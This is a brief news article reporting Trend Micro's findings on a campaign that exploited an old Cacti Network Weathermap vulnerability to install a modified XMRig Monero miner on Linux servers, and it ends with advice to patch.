Cryptojacking – which involves hackers exploiting code vulnerabilities to allow the installation of malicious code into computer programs that are then used to mine for cryptocurrency – has become a widespread phenomenon affecting everyday consumers and major businesses alike. A new report of cryptojacking from cyber-security firm Trend Micro has emerged, that’s among the largest documented yet, resulting in just under $75,000 in Monero to be mined from people’s computers from across the globe.
A vulnerability discovered in the Network Weathermap plugin for Cacti – which is, ironically, an open-source network monitoring tool – was used to infect Linux servers with malware that enables hackers to utilize computer resources to mine for Monero. Monero is often used in cryptojacking schemes, due to its ease of mining and its privacy-centric design that helps to keep the hijackers anonymous.
This specific cryptojacking campaign is using malicious code dubbed “watchd0g.sh” and is focusing on x86-64 Linux servers in the United States, Japan, Taiwan, China, India, and much of the rest of the world.
Vulnerability “CVE-2013-2618” has had a patch available for nearly five years, and allows the hackers to gain control of code execution on the servers its hosted on, enabling a customized version XMRig to be installed. The hackers have modified XMRig’s open-source code in such a way to avoid detection, by limiting the amount of CPU resources it uses as to not set off any red flags and continue to fly under the radar. The advanced code runs every time the computer is fired up, runs every three minutes, and is designed to automatically re-download itself if deleted.
Trend Micro was able to tie the malicious mining software to two Monero wallets, totaling just under $75,000 in the privacy-focused cryptocurrency. The firm also believes that this campaign is connected to another cryptojacking campaign on Windows computers that resulted in over $3 million in XMR being mined.
Trend Micro explains that users must keep their machines up-to-date with all patches, and that “data from Cacti should be property kept internal to the environment.” Since the vulnerability is so old, many users will unknowingly remain affected. For more technical details on the vulnerability, Trend Micro has a full breakdown on their blog.